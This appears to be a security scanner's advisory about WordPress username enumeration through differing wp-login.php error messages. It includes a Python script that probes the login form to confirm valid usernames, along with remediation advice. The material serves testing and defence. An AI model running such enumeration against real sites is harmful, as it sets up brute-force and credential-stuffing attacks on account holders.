Description
During the scan, Cytrix found a WordPress – User Disclosure vulnerability: the site displays usernames that should be concealed in order to prevent User Disclosure. The default WordPress login page (wp-login.php) returns a different error message for a username that does not exist than for a username that exists but was given the wrong password, so the response to a failed login confirms whether a given username is valid.
An attacker can abuse WordPress – User Disclosure by submitting failed login attempts, which lets them enumerate valid usernames and use them in further attacks such as phishing, brute-force or credential-stuffing attempts against those accounts.
Web applications usually use an authentication mechanism to prevent unauthorized or anonymous users from accessing the application’s protected resources and functionality. Attackers look for flaws in the authentication mechanism to reach those protected resources. Username enumeration is one of the most common attacks against authentication mechanisms: it identifies the valid usernames on the system, turning a two-unknown guess (username and password) into a one-unknown guess (password only).
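As an added example (not code from the Cytrix report, nor from WordPress), the following Python script shows how a tester confirms this finding: it submits a deliberately wrong password for each candidate username and classifies the login error text, which in default WordPress differs between an unknown username and a known one. `post_login` is the live variant that POSTs to wp-login.php; the sample responses, the `fake_poster` and `hardened_poster` helpers, and the username list are constructed here so the script runs offline.

```python
"""Check a WordPress login form for username enumeration via failed logins.

Added example for this finding; not part of WordPress or of the scanner.
"""
from urllib import parse, request

# Substrings of WordPress's default wp-login.php error messages. The wording
# differs between an unknown username and a known username with a bad
# password; that difference is the oracle the attacker relies on.
INVALID_USER_MARKERS = (
    "is not registered on this site",   # WordPress 5.x and later
    "Invalid username",                 # older releases
)
VALID_USER_MARKERS = (
    "The password you entered for the username",
)


def classify_login_response(body: str):
    """True if the error text says the username exists, False if it says it
    does not, None if the text is not one of the known messages (for example
    a hardened, generic message that gives nothing away)."""
    if any(marker in body for marker in VALID_USER_MARKERS):
        return True
    if any(marker in body for marker in INVALID_USER_MARKERS):
        return False
    return None


def post_login(login_url: str, username: str, password: str) -> str:
    """Submit one login attempt to wp-login.php and return the HTML body.
    WordPress answers a failed login with HTTP 200 and the error inline."""
    form = {"log": username, "pwd": password, "wp-submit": "Log In"}
    req = request.Request(login_url, data=parse.urlencode(form).encode(), method="POST")
    with request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8", "replace")


def enumerate_usernames(candidates, poster, password="definitely-not-the-password"):
    """Try each candidate with a wrong password; return those whose error
    message reveals that the account exists. poster(username, password) -> html."""
    return [name for name in candidates
            if classify_login_response(poster(name, password)) is True]


def is_enumerable(poster, probe="zz-no-such-user-zz", password="x") -> bool:
    """A site is enumerable if a nonexistent username gets the distinguishing
    'invalid username' wording instead of a generic failure message."""
    return classify_login_response(poster(probe, password)) is False


# Constructed sample responses (trimmed wp-login.php bodies), not captured
# from a real site. 'admin' and 'editor' are treated as existing accounts.
SAMPLE_RESPONSES = {
    "admin": ('<div id="login_error"><strong>Error:</strong> The password you '
              'entered for the username <strong>admin</strong> is incorrect. '
              '<a href="/wp-login.php?action=lostpassword">Lost your password?</a></div>'),
    "editor": ('<div id="login_error"><strong>ERROR</strong>: The password you '
               'entered for the username editor is incorrect.</div>'),
}
UNKNOWN_RESPONSE = ('<div id="login_error"><strong>Error:</strong> The username '
                    '<strong>{user}</strong> is not registered on this site. If you '
                    'are unsure of your username, try your email address instead.</div>')
HARDENED_RESPONSE = '<div id="login_error"><strong>Error:</strong> Invalid login credentials.</div>'


def fake_poster(username, password):
    """Offline stand-in for post_login against an unpatched default site."""
    return SAMPLE_RESPONSES.get(username, UNKNOWN_RESPONSE.format(user=username))


def hardened_poster(username, password):
    """Offline stand-in for a site that returns one generic message."""
    return HARDENED_RESPONSE


if __name__ == "__main__":
    candidates = ["admin", "nobody", "editor"]          # constructed wordlist
    print("default site enumerable:", is_enumerable(fake_poster))
    print("confirmed usernames:", enumerate_usernames(candidates, fake_poster))
    print("hardened site enumerable:", is_enumerable(hardened_poster))
```

Against a live target, pass `lambda u, p: post_login("https://example.test/wp-login.php", u, p)` as the poster (the URL is a placeholder). Rate-limit the requests: lockout plugins will block the probe, and a burst of failed logins is exactly what a defender's detection rule should fire on.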
Recommendation
To fix this finding and limit its impact:
- Return the same generic error message for every failed login, whether the username exists or not (for example by hooking the login_errors filter from a small plugin), so the response no longer reveals valid usernames.
- Use policies to enforce strong WordPress passwords.
- Enable 2FA with a WordPress two-factor authentication plugin.
- Add HTTP authentication in front of the WordPress login page (wp-login.php).
- Restrict access to the login page (wp-login.php) and the admin area (/wp-admin/) to authorized IP addresses only.
Also rename the default admin account to something less predictable to reduce the chance of a successful brute-force attack. Note that the generic error message only closes the login-form channel; if usernames are also exposed elsewhere (for example through author archives or the REST API), those channels need their own controls.
References
https://wordpress.org/support/article/updating-wordpress/